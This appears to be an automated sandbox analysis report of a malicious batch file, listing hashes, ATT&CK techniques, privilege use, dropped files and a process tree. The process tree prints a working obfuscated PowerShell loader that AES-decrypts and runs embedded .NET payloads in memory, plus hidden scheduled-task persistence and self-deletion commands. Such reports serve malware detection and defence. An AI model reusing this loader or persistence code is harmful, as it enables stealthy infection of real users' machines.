5a38a43e7227ffb333f7350275f119c6d9dd94b8bcd278732501fb48302edefc

Analysis

max time kernel
138s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
02-06-2023 21:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.bat
Size

53KB
MD5

ec8c17c00514ef283f47eada16a9353f
SHA1

c51c24ba6f64ad209da8a4fd8c6db932b151da57
SHA256

5a38a43e7227ffb333f7350275f119c6d9dd94b8bcd278732501fb48302edefc
SHA512

9247bc9cda4ab25c562cea815a81124d56507966c39ecfb1cf484e24317ce538c574c2857de7a7048cbedc5952c5da8c0853f05d67b72957739b27acc5c17484
SSDEEP

1536:cGoAhinrWL+ALprkrDxefHnFylU8Nn5BPrf:ZoznrbALpelNnTP7

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	1.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	XgsDa.bat.exe

Executes dropped EXE 2 IoCs

pid	Process
4900	1.bat.exe
384	XgsDa.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	1.bat.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1888	powershell.exe
1888	powershell.exe
4900	1.bat.exe
4900	1.bat.exe
2256	powershell.exe
3496	powershell.exe
2256	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
1596	powershell.exe
1596	powershell.exe
3828	powershell.exe
3828	powershell.exe
384	XgsDa.bat.exe
384	XgsDa.bat.exe
2036	powershell.exe
2196	powershell.exe
2036	powershell.exe
2196	powershell.exe
2196	powershell.exe
2196	powershell.exe
384	XgsDa.bat.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	4900	1.bat.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeIncreaseQuotaPrivilege	2256	powershell.exe
Token: SeSecurityPrivilege	2256	powershell.exe
Token: SeTakeOwnershipPrivilege	2256	powershell.exe
Token: SeLoadDriverPrivilege	2256	powershell.exe
Token: SeSystemProfilePrivilege	2256	powershell.exe
Token: SeSystemtimePrivilege	2256	powershell.exe
Token: SeProfSingleProcessPrivilege	2256	powershell.exe
Token: SeIncBasePriorityPrivilege	2256	powershell.exe
Token: SeCreatePagefilePrivilege	2256	powershell.exe
Token: SeBackupPrivilege	2256	powershell.exe
Token: SeRestorePrivilege	2256	powershell.exe
Token: SeShutdownPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeSystemEnvironmentPrivilege	2256	powershell.exe
Token: SeRemoteShutdownPrivilege	2256	powershell.exe
Token: SeUndockPrivilege	2256	powershell.exe
Token: SeManageVolumePrivilege	2256	powershell.exe
Token: 33	2256	powershell.exe
Token: 34	2256	powershell.exe
Token: 35	2256	powershell.exe
Token: 36	2256	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeIncreaseQuotaPrivilege	1596	powershell.exe
Token: SeSecurityPrivilege	1596	powershell.exe
Token: SeTakeOwnershipPrivilege	1596	powershell.exe
Token: SeLoadDriverPrivilege	1596	powershell.exe
Token: SeSystemProfilePrivilege	1596	powershell.exe
Token: SeSystemtimePrivilege	1596	powershell.exe
Token: SeProfSingleProcessPrivilege	1596	powershell.exe
Token: SeIncBasePriorityPrivilege	1596	powershell.exe
Token: SeCreatePagefilePrivilege	1596	powershell.exe
Token: SeBackupPrivilege	1596	powershell.exe
Token: SeRestorePrivilege	1596	powershell.exe
Token: SeShutdownPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeSystemEnvironmentPrivilege	1596	powershell.exe
Token: SeRemoteShutdownPrivilege	1596	powershell.exe
Token: SeUndockPrivilege	1596	powershell.exe
Token: SeManageVolumePrivilege	1596	powershell.exe
Token: 33	1596	powershell.exe
Token: 34	1596	powershell.exe
Token: 35	1596	powershell.exe
Token: 36	1596	powershell.exe
Token: SeIncreaseQuotaPrivilege	1596	powershell.exe
Token: SeSecurityPrivilege	1596	powershell.exe
Token: SeTakeOwnershipPrivilege	1596	powershell.exe
Token: SeLoadDriverPrivilege	1596	powershell.exe
Token: SeSystemProfilePrivilege	1596	powershell.exe
Token: SeSystemtimePrivilege	1596	powershell.exe
Token: SeProfSingleProcessPrivilege	1596	powershell.exe
Token: SeIncBasePriorityPrivilege	1596	powershell.exe
Token: SeCreatePagefilePrivilege	1596	powershell.exe
Token: SeBackupPrivilege	1596	powershell.exe
Token: SeRestorePrivilege	1596	powershell.exe
Token: SeShutdownPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeSystemEnvironmentPrivilege	1596	powershell.exe
Token: SeRemoteShutdownPrivilege	1596	powershell.exe
Token: SeUndockPrivilege	1596	powershell.exe
Token: SeManageVolumePrivilege	1596	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
384	XgsDa.bat.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3784 wrote to memory of 1888	3784	cmd.exe	84
PID 3784 wrote to memory of 1888	3784	cmd.exe	84
PID 3784 wrote to memory of 4900	3784	cmd.exe	85
PID 3784 wrote to memory of 4900	3784	cmd.exe	85
PID 3784 wrote to memory of 4900	3784	cmd.exe	85
PID 4900 wrote to memory of 3496	4900	1.bat.exe	86
PID 4900 wrote to memory of 3496	4900	1.bat.exe	86
PID 4900 wrote to memory of 3496	4900	1.bat.exe	86
PID 4900 wrote to memory of 2256	4900	1.bat.exe	88
PID 4900 wrote to memory of 2256	4900	1.bat.exe	88
PID 4900 wrote to memory of 2256	4900	1.bat.exe	88
PID 4900 wrote to memory of 1596	4900	1.bat.exe	90
PID 4900 wrote to memory of 1596	4900	1.bat.exe	90
PID 4900 wrote to memory of 1596	4900	1.bat.exe	90
PID 4900 wrote to memory of 3428	4900	1.bat.exe	92
PID 4900 wrote to memory of 3428	4900	1.bat.exe	92
PID 4900 wrote to memory of 3428	4900	1.bat.exe	92
PID 3428 wrote to memory of 4316	3428	WScript.exe	93
PID 3428 wrote to memory of 4316	3428	WScript.exe	93
PID 3428 wrote to memory of 4316	3428	WScript.exe	93
PID 4316 wrote to memory of 3828	4316	cmd.exe	95
PID 4316 wrote to memory of 3828	4316	cmd.exe	95
PID 4316 wrote to memory of 3828	4316	cmd.exe	95
PID 4316 wrote to memory of 384	4316	cmd.exe	96
PID 4316 wrote to memory of 384	4316	cmd.exe	96
PID 4316 wrote to memory of 384	4316	cmd.exe	96
PID 384 wrote to memory of 2196	384	XgsDa.bat.exe	97
PID 384 wrote to memory of 2196	384	XgsDa.bat.exe	97
PID 384 wrote to memory of 2196	384	XgsDa.bat.exe	97
PID 384 wrote to memory of 2036	384	XgsDa.bat.exe	99
PID 384 wrote to memory of 2036	384	XgsDa.bat.exe	99
PID 384 wrote to memory of 2036	384	XgsDa.bat.exe	99

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -c #
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1888
- C:\Users\Admin\AppData\Local\Temp\1.bat.exe
  "C:\Users\Admin\AppData\Local\Temp\1.bat.exe" $ClZY='LocGkfacGkfdcGkf'.Replace('cGkf', '');$Cosg='ReadcGkfLincGkfescGkf'.Replace('cGkf', '');$CKgZ='ChacGkfngcGkfeEcGkfxtecGkfnsicGkfoncGkf'.Replace('cGkf', '');$mdDK='CrcGkfeatecGkfDecGkfcrcGkfycGkfptorcGkf'.Replace('cGkf', '');$dpRd='TcGkfracGkfncGkfscGkfforcGkfmcGkfFcGkfinalcGkfBcGkfloccGkfkcGkf'.Replace('cGkf', '');$TfJi='GetCcGkfucGkfrcGkfrcGkfecGkfntPcGkfrocGkfcescGkfscGkf'.Replace('cGkf', '');$ZaLV='MaicGkfnMocGkfdulecGkf'.Replace('cGkf', '');$YvXE='EncGkftcGkfrycGkfPocGkfintcGkf'.Replace('cGkf', '');$yvfJ='FcGkfircGkfstcGkf'.Replace('cGkf', '');$nlTT='IcGkfnvcGkfokcGkfecGkf'.Replace('cGkf', '');$xbeG='ScGkfplcGkfitcGkf'.Replace('cGkf', '');$dIab='FcGkfrocGkfmBacGkfsecGkf64cGkfStcGkfrincGkfgcGkf'.Replace('cGkf', '');function YGKaC($qnjQQ){$YTqCE=[System.Security.Cryptography.Aes]::Create();$YTqCE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YTqCE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YTqCE.Key=[System.Convert]::$dIab('tnhK18G6AEhO+6UA39Ny8OROXuxQ7/wL8/6fO39b1SY=');$YTqCE.IV=[System.Convert]::$dIab('01lBIYEpZO5++Co5QPW0Pw==');$MuNSz=$YTqCE.$mdDK();$XtiHW=$MuNSz.$dpRd($qnjQQ,0,$qnjQQ.Length);$MuNSz.Dispose();$YTqCE.Dispose();$XtiHW;}function fCuOF($qnjQQ){$lbzbE=New-Object System.IO.MemoryStream(,$qnjQQ);$snKTq=New-Object System.IO.MemoryStream;$dKObF=New-Object System.IO.Compression.GZipStream($lbzbE,[IO.Compression.CompressionMode]::Decompress);$dKObF.CopyTo($snKTq);$dKObF.Dispose();$lbzbE.Dispose();$snKTq.Dispose();$snKTq.ToArray();}$wXZyX=[System.Linq.Enumerable]::$yvfJ([System.IO.File]::$Cosg([System.IO.Path]::$CKgZ([System.Diagnostics.Process]::$TfJi().$ZaLV.FileName, $null)));$AiqYs=$wXZyX.Substring(3).$xbeG(':');$TXfSg=fCuOF (YGKaC ([Convert]::$dIab($AiqYs[0])));$wjSXh=fCuOF (YGKaC ([Convert]::$dIab($AiqYs[1])));[System.Reflection.Assembly]::$ClZY([byte[]]$wjSXh).$YvXE.$nlTT($null,$null);[System.Reflection.Assembly]::$ClZY([byte[]]$TXfSg).$YvXE.$nlTT($null,$null);
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4900);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_XgsDa' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\XgsDa.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1596
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\XgsDa.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\XgsDa.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4316
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c #
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3828
    - - C:\Users\Admin\AppData\Roaming\XgsDa.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\XgsDa.bat.exe" $ClZY='LocGkfacGkfdcGkf'.Replace('cGkf', '');$Cosg='ReadcGkfLincGkfescGkf'.Replace('cGkf', '');$CKgZ='ChacGkfngcGkfeEcGkfxtecGkfnsicGkfoncGkf'.Replace('cGkf', '');$mdDK='CrcGkfeatecGkfDecGkfcrcGkfycGkfptorcGkf'.Replace('cGkf', '');$dpRd='TcGkfracGkfncGkfscGkfforcGkfmcGkfFcGkfinalcGkfBcGkfloccGkfkcGkf'.Replace('cGkf', '');$TfJi='GetCcGkfucGkfrcGkfrcGkfecGkfntPcGkfrocGkfcescGkfscGkf'.Replace('cGkf', '');$ZaLV='MaicGkfnMocGkfdulecGkf'.Replace('cGkf', '');$YvXE='EncGkftcGkfrycGkfPocGkfintcGkf'.Replace('cGkf', '');$yvfJ='FcGkfircGkfstcGkf'.Replace('cGkf', '');$nlTT='IcGkfnvcGkfokcGkfecGkf'.Replace('cGkf', '');$xbeG='ScGkfplcGkfitcGkf'.Replace('cGkf', '');$dIab='FcGkfrocGkfmBacGkfsecGkf64cGkfStcGkfrincGkfgcGkf'.Replace('cGkf', '');function YGKaC($qnjQQ){$YTqCE=[System.Security.Cryptography.Aes]::Create();$YTqCE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YTqCE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YTqCE.Key=[System.Convert]::$dIab('tnhK18G6AEhO+6UA39Ny8OROXuxQ7/wL8/6fO39b1SY=');$YTqCE.IV=[System.Convert]::$dIab('01lBIYEpZO5++Co5QPW0Pw==');$MuNSz=$YTqCE.$mdDK();$XtiHW=$MuNSz.$dpRd($qnjQQ,0,$qnjQQ.Length);$MuNSz.Dispose();$YTqCE.Dispose();$XtiHW;}function fCuOF($qnjQQ){$lbzbE=New-Object System.IO.MemoryStream(,$qnjQQ);$snKTq=New-Object System.IO.MemoryStream;$dKObF=New-Object System.IO.Compression.GZipStream($lbzbE,[IO.Compression.CompressionMode]::Decompress);$dKObF.CopyTo($snKTq);$dKObF.Dispose();$lbzbE.Dispose();$snKTq.Dispose();$snKTq.ToArray();}$wXZyX=[System.Linq.Enumerable]::$yvfJ([System.IO.File]::$Cosg([System.IO.Path]::$CKgZ([System.Diagnostics.Process]::$TfJi().$ZaLV.FileName, $null)));$AiqYs=$wXZyX.Substring(3).$xbeG(':');$TXfSg=fCuOF (YGKaC ([Convert]::$dIab($AiqYs[0])));$wjSXh=fCuOF (YGKaC ([Convert]::$dIab($AiqYs[1])));[System.Reflection.Assembly]::$ClZY([byte[]]$wjSXh).$YvXE.$nlTT($null,$null);[System.Reflection.Assembly]::$ClZY([byte[]]$TXfSg).$YvXE.$nlTT($null,$null);
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:384
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(384);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2196
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\XgsDa')
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2036

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
0275639b593d13e083356369f117afff

SHA1
5bcd04e60226ebdb77cf7d9dd9fd7234d0e07242

SHA256
bfc95718372bf92a9c0a294504a43849268eb05c4f9a13e36d39260ce99ff4c2

SHA512
cc18fa289c96609baa3e0b89bb3baec95450d3fddeecc7d9a48804499a74e8fbec396c171d04b1a7b03a8bd767b8ed58ca22db21ac1c1ada95f6ada0c6cd0df4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
39747bdbda63da387a184206b52e7577

SHA1
da29743d249bbed5cb32a3c4bc613d2e0ea7a215

SHA256
4106e3665d3b85ccac34affe78f59be65a834ca0decf2f7191c7c94ec84bfef8

SHA512
0f0605df448f60b8d05f454ea906bfffded882e9f78a69198d5a6cbd114c07141c076ba2a9d226011302d11d5a7d3a426acd5d2d7bee47134f17db423f2e0cde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
39747bdbda63da387a184206b52e7577

SHA1
da29743d249bbed5cb32a3c4bc613d2e0ea7a215

SHA256
4106e3665d3b85ccac34affe78f59be65a834ca0decf2f7191c7c94ec84bfef8

SHA512
0f0605df448f60b8d05f454ea906bfffded882e9f78a69198d5a6cbd114c07141c076ba2a9d226011302d11d5a7d3a426acd5d2d7bee47134f17db423f2e0cde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
71a3d1ea758550e31a307334d10a3d71

SHA1
2205659271171de8f409928ddf0a4f242136b35e

SHA256
dbcbe8924a23bc5e4cf6097351c5d760821d5211ef3ce4685d7c14fdad9b3140

SHA512
a05bfc3bb184f5efd1d39e5556d8c45c3aa5914ed4ed1b036ad4268bbe940387295bf76e1ca5970d0fa0ad9802f52f867e171a6293643c8fcfefe92296fc56dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
71a3d1ea758550e31a307334d10a3d71

SHA1
2205659271171de8f409928ddf0a4f242136b35e

SHA256
dbcbe8924a23bc5e4cf6097351c5d760821d5211ef3ce4685d7c14fdad9b3140

SHA512
a05bfc3bb184f5efd1d39e5556d8c45c3aa5914ed4ed1b036ad4268bbe940387295bf76e1ca5970d0fa0ad9802f52f867e171a6293643c8fcfefe92296fc56dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5lasopde.grt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\XgsDa.bat

Filesize
53KB

MD5
ec8c17c00514ef283f47eada16a9353f

SHA1
c51c24ba6f64ad209da8a4fd8c6db932b151da57

SHA256
5a38a43e7227ffb333f7350275f119c6d9dd94b8bcd278732501fb48302edefc

SHA512
9247bc9cda4ab25c562cea815a81124d56507966c39ecfb1cf484e24317ce538c574c2857de7a7048cbedc5952c5da8c0853f05d67b72957739b27acc5c17484

Download Submit
C:\Users\Admin\AppData\Roaming\XgsDa.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\XgsDa.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\XgsDa.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\XgsDa.vbs

Filesize
138B

MD5
a27f16d5c2ab18da6fdb092d07122e03

SHA1
40ca4fe1735f1e0217bb12011a1eb446772826ce

SHA256
8fbe2e19be0786f810847031a9feccaf5c351c1a7b28d41179c4f8fddb673b8e

SHA512
17e907a52a7f498f038141b548f1728b9d5e6594980c2c28e70e6480a965c6fa8745e1d60ce51306552342d95de472f4aec5465430ac4ab568aa24dfb6dc2bc0

Download Submit
memory/384-330-0x0000000007EF0000-0x0000000007F82000-memory.dmp

Filesize
584KB

Download
memory/384-285-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/384-331-0x0000000007E60000-0x0000000007E6A000-memory.dmp

Filesize
40KB

Download
memory/384-286-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/384-288-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/384-329-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/384-332-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/384-326-0x00000000075C0000-0x000000000765C000-memory.dmp

Filesize
624KB

Download
memory/384-327-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/384-328-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/384-335-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/1596-232-0x0000000070DC0000-0x0000000070E0C000-memory.dmp

Filesize
304KB

Download
memory/1596-221-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/1596-225-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/1888-134-0x0000018FEBB30000-0x0000018FEBB40000-memory.dmp

Filesize
64KB

Download
memory/1888-133-0x0000018FEBB30000-0x0000018FEBB40000-memory.dmp

Filesize
64KB

Download
memory/1888-137-0x0000018FEBA70000-0x0000018FEBA92000-memory.dmp

Filesize
136KB

Download
memory/2036-323-0x000000007F9B0000-0x000000007F9C0000-memory.dmp

Filesize
64KB

Download
memory/2036-324-0x0000000004A10000-0x0000000004A20000-memory.dmp

Filesize
64KB

Download
memory/2036-309-0x0000000004A10000-0x0000000004A20000-memory.dmp

Filesize
64KB

Download
memory/2036-313-0x0000000071430000-0x000000007147C000-memory.dmp

Filesize
304KB

Download
memory/2036-310-0x0000000004A10000-0x0000000004A20000-memory.dmp

Filesize
64KB

Download
memory/2196-333-0x0000000004BA0000-0x0000000004BB0000-memory.dmp

Filesize
64KB

Download
memory/2196-334-0x0000000004BA0000-0x0000000004BB0000-memory.dmp

Filesize
64KB

Download
memory/2196-312-0x0000000004BA0000-0x0000000004BB0000-memory.dmp

Filesize
64KB

Download
memory/2196-311-0x0000000004BA0000-0x0000000004BB0000-memory.dmp

Filesize
64KB

Download
memory/2256-199-0x00000000075C0000-0x00000000075F2000-memory.dmp

Filesize
200KB

Download
memory/2256-200-0x0000000070DC0000-0x0000000070E0C000-memory.dmp

Filesize
304KB

Download
memory/2256-198-0x0000000004F90000-0x0000000004FA0000-memory.dmp

Filesize
64KB

Download
memory/2256-211-0x000000007F170000-0x000000007F180000-memory.dmp

Filesize
64KB

Download
memory/2256-210-0x00000000069A0000-0x00000000069BE000-memory.dmp

Filesize
120KB

Download
memory/2256-213-0x00000000079A0000-0x0000000007A36000-memory.dmp

Filesize
600KB

Download
memory/2256-212-0x0000000007750000-0x000000000775A000-memory.dmp

Filesize
40KB

Download
memory/2256-175-0x0000000004F90000-0x0000000004FA0000-memory.dmp

Filesize
64KB

Download
memory/2256-174-0x0000000004F90000-0x0000000004FA0000-memory.dmp

Filesize
64KB

Download
memory/3496-273-0x0000000008130000-0x00000000086D4000-memory.dmp

Filesize
5.6MB

Download
memory/3496-176-0x00000000055E0000-0x00000000055F0000-memory.dmp

Filesize
64KB

Download
memory/3496-267-0x0000000006E40000-0x0000000006E62000-memory.dmp

Filesize
136KB

Download
memory/3496-242-0x00000000055E0000-0x00000000055F0000-memory.dmp

Filesize
64KB

Download
memory/3496-177-0x00000000055E0000-0x00000000055F0000-memory.dmp

Filesize
64KB

Download
memory/3496-243-0x00000000055E0000-0x00000000055F0000-memory.dmp

Filesize
64KB

Download
memory/3496-264-0x00000000055E0000-0x00000000055F0000-memory.dmp

Filesize
64KB

Download
memory/3828-265-0x0000000002B60000-0x0000000002B70000-memory.dmp

Filesize
64KB

Download
memory/3828-266-0x0000000002B60000-0x0000000002B70000-memory.dmp

Filesize
64KB

Download
memory/4900-196-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

Filesize
64KB

Download
memory/4900-197-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

Filesize
64KB

Download
memory/4900-162-0x0000000005D30000-0x0000000005D96000-memory.dmp

Filesize
408KB

Download
memory/4900-168-0x00000000065B0000-0x00000000065CE000-memory.dmp

Filesize
120KB

Download
memory/4900-161-0x0000000005CC0000-0x0000000005D26000-memory.dmp

Filesize
408KB

Download
memory/4900-155-0x0000000005560000-0x0000000005582000-memory.dmp

Filesize
136KB

Download
